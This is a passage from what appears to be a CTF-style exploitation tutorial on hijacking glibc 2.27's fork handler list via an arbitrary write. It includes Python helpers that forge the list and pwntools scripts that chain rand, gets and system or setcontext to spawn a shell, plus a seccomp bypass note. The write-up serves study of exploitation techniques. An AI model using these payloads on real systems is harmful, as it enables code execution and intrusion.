    addrs = [addr+0x10*i for i in range(1, len(funcs))] + [0]
    for i, (addr, func) in enumerate(zip(addrs, funcs)):
        off = i*0x10
        data[off:off+0x10] = p64(addr) + p64(func)
    for i in range(len(funcs)):
        off = 0x28 + 0x10*i
        if off+4 > len(data):
            break
        val = u32(bytes(data[off:off+4])) - 1
        # the first refcntr must be non-zero
        # otherwise it'll loop forever
        if i == 0:
            assert val != 0
        data[off:off+4] = p32(val % (1<<32))
    return bytes(data)
```

You can do a standard array (`forge`), or you can utilise the unused space to pack it as much as possible (`forge_packed`). Both must contain at least the first `refcntr` though, as we need to ensure that that is non-zero. The rest of the `refcntr`'s will be incremented, and if these are outside our data, they *might* corrupt other data, but if that's not a concern, then you can use `smallest=True`.
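To sanity-check a forged list before sending it, the plain (unpacked) layout can be rebuilt and walked with nothing but `struct`. This is a sketch under my own assumptions: `forge_list` and `walk` are hypothetical names, the offsets are the ones used above (`next` at `0x00`, `prepare_handler` at `0x08`, `refcntr` at `0x28`, entry size `0x30`), and the addresses are made up.

```python
import struct

ENTRY = 0x30  # size of one fork_handler entry on 2.27

def forge_list(addr, *funcs):
    """Lay out one full entry per function, each linked to the next."""
    data = b""
    for i, func in enumerate(funcs):
        nxt = addr + (i + 1) * ENTRY if i < len(funcs) - 1 else 0
        entry = bytearray(ENTRY)
        struct.pack_into("<QQ", entry, 0x00, nxt, func)   # next, prepare_handler
        struct.pack_into("<I", entry, 0x28, 1)            # non-zero refcntr
        data += bytes(entry)
    return data

def walk(addr, data):
    """Follow the next pointers from the head and return the handlers in call order."""
    (head_refcntr,) = struct.unpack_from("<I", data, 0x28)
    assert head_refcntr != 0, "a zero refcntr on the head would never get past the retry loop"
    called, cur = [], addr
    while cur:
        nxt, func = struct.unpack_from("<QQ", data, cur - addr)
        called.append(func)
        cur = nxt
    return called

base = 0x7ffff7dd0000   # hypothetical address of the forged list
print([hex(f) for f in walk(base, forge_list(base, 0x1111, 0x2222, 0x3333))])
```

Unlike the dynarray versions, the handlers here run in list order, so the functions are written in the order they should be called.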

### ret2rand

Therefore the only way we can control `rdi` is through `prepare_handler` calls. We need a function that will populate `rdi` with some writable address, which we could then write to using `gets`. [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md) is unfortunately not very applicable here, as it's quite limited prior to `2.30` ([see here](https://sashactf.gitbook.io/pwn-notes/pwn/pages/pKfmKyEye0hMtzHAJiux#glibc-prior-to-2.30)).

Thankfully, I was able to find an alternative: `rand`.

[rand](https://linux.die.net/man/3/rand) is a pseudo-random number generator, and with that comes the need to keep track of the random state. In this case, that state is [unsafe\_state](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L160), which is of type `random_data`:

<figure><img src="/files/iDsckQC8xoinzoVkhYE8" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L287">random</a></p></figcaption></figure>

This state is passed to `__random_r`, as the first argument :eyes:. What's more is that `__random_r` is relatively simple, doesn't make any function calls, or alter the pointer itself, which means that it can just keep `unsafe_state` in `rdi` (we'll look at this in a bit).

#### But what about the locking?

Well that's a good question, because we've seen before (in [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md#io_stdfile_0_lock-in-rdi)) that locking `lock` can result in `lock` being loaded into `rdi`.

<figure><img src="/files/VEZxdqOp5g5CeQzuxuqk" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/nptl/libc-lockP.h#L210">__libc_lock_unlock</a></p></figcaption></figure>

Ah, it's our good ol' friend `lll_unlock`.

<figure><img src="/files/aQXmcfhoNP95YrBVfnXO" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/unix/sysv/linux/x86_64/lowlevellock.h#L196">lll_unlock</a>: Written in assembly</p></figcaption></figure>

<figure><img src="/files/Hx0j46nbaV3qDt6apvvv" alt=""><figcaption><p><code>lll_unlock</code> in <code>__random</code></p></figcaption></figure>

Just like in [ret2gets prior to 2.30](https://sashactf.gitbook.io/pwn-notes/pwn/pages/pKfmKyEye0hMtzHAJiux#glibc-prior-to-2.30), it only unlocks by using `__lll_unlock_wake_private` when the process is multi-threaded, so the single-threaded case works flawlessly and doesn't touch `rdi`.

The multi-threaded case is a bit more complex, but if it's locked with the value [LLL\_LOCK\_INITIALIZER\_LOCKED](https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/unix/sysv/linux/x86_64/lowlevellock.h#L57) (1), then it also doesn't touch `rdi` (yay). However, `lock` can also contain the value [LLL\_LOCK\_INITIALIZER\_WAITERS](https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/unix/sysv/linux/x86_64/lowlevellock.h#L58) (2), in which case the `dec` won't result in `0`, and it will execute `__lll_unlock_wake_private`, thus clobbering `rdi`.

This should be unlikely to happen to `rand`'s [lock](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L197), as you'd need multiple threads trying to access `rand` at the same time, but it's not impossible, so be careful.

#### Exploitation

So let's go back to `random`, specifically `__random_r`. We can use `rand` followed by `gets` to write to the `unsafe_state`, but we'll need to call `rand` again to put `unsafe_state` back into `rdi` after `gets`. And if we call `rand` using a corrupted `unsafe_state`, then we could cause a crash?

So we need to conform to `random_data`:

<figure><img src="/files/HYmZE7RvAkzzlKTvpnj9" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/stdlib.h#L423">random_data</a></p></figcaption></figure>

But this contains multiple pointers, including one right at the beginning, where we might want to put a `/bin/sh` string, for example! But are these always used? Let's check `__random_r`:

<figure><img src="/files/acMMtaJo8lSiRNQt33pL" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random_r.c#L353">__random_r</a></p></figcaption></figure>

At first glance, we can see the `fptr`, `rptr`, `state` pointers being used in the `else` clause. However, there's an interesting case: `buf->rand_type == TYPE_0`. This seems to be much simpler, and doesn't use `fptr` or `rptr`! It does still use `state`, but as long as it's populated with a writable address, it won't `SEGFAULT`. The default `rand_type` is [TYPE\_3](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L119), but we can easily overwrite it to [TYPE\_0](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L101).
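To see why `TYPE_0` is so forgiving, here's a minimal Python model of that branch, assuming it matches the linear congruential step in the `__random_r` source linked above. `random_r_type0` and the `bytearray` standing in for memory are made up for illustration. The point is that it only reads and writes a single 32-bit word at `state`, so any writable address will do.

```python
import struct


def random_r_type0(memory: bytearray, state_off: int) -> int:
    """Model of the TYPE_0 branch: one LCG step on the word at `state`.

    `memory` and `state_off` are stand-ins for process memory and the
    `state` pointer; this is a sketch, not glibc's code.
    """
    (word,) = struct.unpack_from("<I", memory, state_off)
    val = (word * 1103515245 + 12345) & 0x7FFFFFFF
    struct.pack_into("<I", memory, state_off, val)  # state[0] = val
    return val                                      # *result = val


mem = bytearray(16)
struct.pack_into("<I", mem, 4, 1)  # pretend state[0] == 1
first = random_r_type0(mem, 4)
print(hex(first))
```

Nothing outside those 4 bytes is touched, which is why the rest of the struct is free for our own data.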

Putting this together, we arrive at the following for `system("/bin/sh")`:

```python
addr = libc.sym.__fork_handlers
data = p64(addr+8) + forge_packed(addr+8, libc.sym.rand, libc.sym.gets, libc.sym.rand, libc.sym.system)
assert b"\n" not in data

extra_data = flat({
    0x00: b"/bin/sh\x00",
    0x10: libc.sym.randtbl+4,    # the previous `state` field
    0x18: p32(0),   # TYPE_0
})
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()
```
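If you want to see the layout of `extra_data` without `pwntools`, here's a rough equivalent using only `struct`. The offsets are an assumption based on the x86-64 layout of `random_data` in 2.27, `forge_random_data` is a hypothetical helper, and the address in the example is a made-up placeholder for `randtbl+4`. Unlike `flat`, this pads the gaps with null bytes.

```python
import struct

# Assumed x86-64 offsets within struct random_data (glibc 2.27)
OFF_STATE = 0x10      # int32_t *state
OFF_RAND_TYPE = 0x18  # int rand_type
TYPE_0 = 0


def forge_random_data(prefix: bytes, state_addr: int) -> bytes:
    """Build the bytes written over unsafe_state (hypothetical helper).

    `prefix` overlays the unused fptr/rptr fields, `state_addr` must be
    writable, and rand_type is forced to TYPE_0.
    """
    if len(prefix) > OFF_STATE:
        raise ValueError("prefix would overlap the state pointer")
    buf = bytearray(OFF_RAND_TYPE + 4)
    buf[:len(prefix)] = prefix
    struct.pack_into("<Q", buf, OFF_STATE, state_addr)
    struct.pack_into("<i", buf, OFF_RAND_TYPE, TYPE_0)
    if b"\n" in buf:
        raise ValueError("gets stops reading at a newline")
    return bytes(buf)


# 0x7ffff7dd1004 is a placeholder, not a real randtbl+4 address
payload = forge_random_data(b"/bin/sh\x00", 0x7FFFF7DD1004)
print(payload.hex())
```

The newline check mirrors the `assert` in the exploit: `gets` stops reading at `\n`, so an address containing `0x0a` would truncate the write.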

We're also able to use this for `setcontext`:

```python
addr = libc.sym.__fork_handlers
data = p64(addr+8) + forge_packed(addr+8, libc.sym.rand, libc.sym.gets, libc.sym.rand, libc.sym.setcontext)
assert b"\n" not in data

ucontext = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": libc.sym.unsafe_state+0x200
}, libc.sym.unsafe_state)

extra_data = flat({
    0x10: libc.sym.randtbl+4,
    0x18: p32(0),   # TYPE_0
})
extra_data += ucontext[len(extra_data):]
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()
```

### Return of the seccomp

<figure><img src="/files/JLGgtbh0Y7w04JU9pTZx" alt=""><figcaption></figcaption></figure>

This time our work is actually mostly done for us, because in `2.27` and prior, `setcontext` doesn't use `rdx` for the `ucontext`.

<figure><img src="/files/lPIf2LGpeLsY7GIhvTr4" alt=""><figcaption><p><code>setcontext</code> after <code>sigprocmask</code></p></figcaption></figure>

So it's just as simple as jumping to `setcontext+37` (or later).

## Detecting arguments to handlers

It can be quite cumbersome to check the disassembly to work out ahead of time what the arguments are going to be. That's why I wrote a script, just like with [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md#detecting-this-behaviour), which traces `fork` with `angr` and logs the arguments to each call to `prepare_handler`.

{% embed url="<https://gist.github.com/sasha-999/4feff0af21c4d028fd5701e8f11f12c0>" %}
`detect_fork.py`
{% endembed %}

## fork -> one\_gadget

So why would we care about this? I mean sure, we can control `fork` to either execute `system` for a shell, or `setcontext` for ROP/shellcode, but that's only useful if there are calls to `fork`. Not all applications will use `fork` after all.

What about functions in glibc? Surely some of them will use `fork`, after all there are functions like `system` which would create a new process to execute a shell command, right?

Well unfortunately not many glibc functions use `__libc_fork`.

<figure><img src="/files/yxVH2KBxUscvx5scKMCD" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.39/A/ident/__fork">Uses of __fork</a></p></figcaption></figure>

* [forkpty](https://elixir.bootlin.com/glibc/glibc-2.39/source/login/forkpty.c#L34)
* [grantpt](https://elixir.bootlin.com/glibc/glibc-2.39/source/sysdeps/unix/grantpt.c#L207)
* [daemon](https://elixir.bootlin.com/glibc/glibc-2.39/source/misc/daemon.c#L48)
* [\_IO\_old\_popen](https://elixir.bootlin.com/glibc/glibc-2.39/source/libio/oldiopopen.c#L91) (not used)
* [vfork](https://elixir.bootlin.com/glibc/glibc-2.39/source/posix/vfork.c#L26) (if the `vfork` syscall doesn't exist)

The rest, like `system` or `popen`, will use an inlined `clone` call.

<figure><img src="/files/s5yDWqB5pK3y4oRICHwO" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.39/source/sysdeps/unix/sysv/linux/spawni.c#L415">__spawnix</a>: Used by <code>system</code></p></figcaption></figure>

Well, like I mentioned in the beginning, by overwriting `fork_handlers`, we effectively have turned `fork` into a `one_gadget`. However, this has a few benefits over a regular `one_gadget`:

* No constraints.
* Can trigger ROP.

So if you have a function call primitive, and don't have strong argument control, but can use an arbitrary write, this may be useful.

However, a lot of what's been done here can also be done with `exit`, and more easily, as that has explicit argument control. The only downside there is that you have to deal with pointer mangling too.

In conclusion, there may be some cases where this can be useful, but even if this is never used, I still think it was interesting, and I hope you did too :)

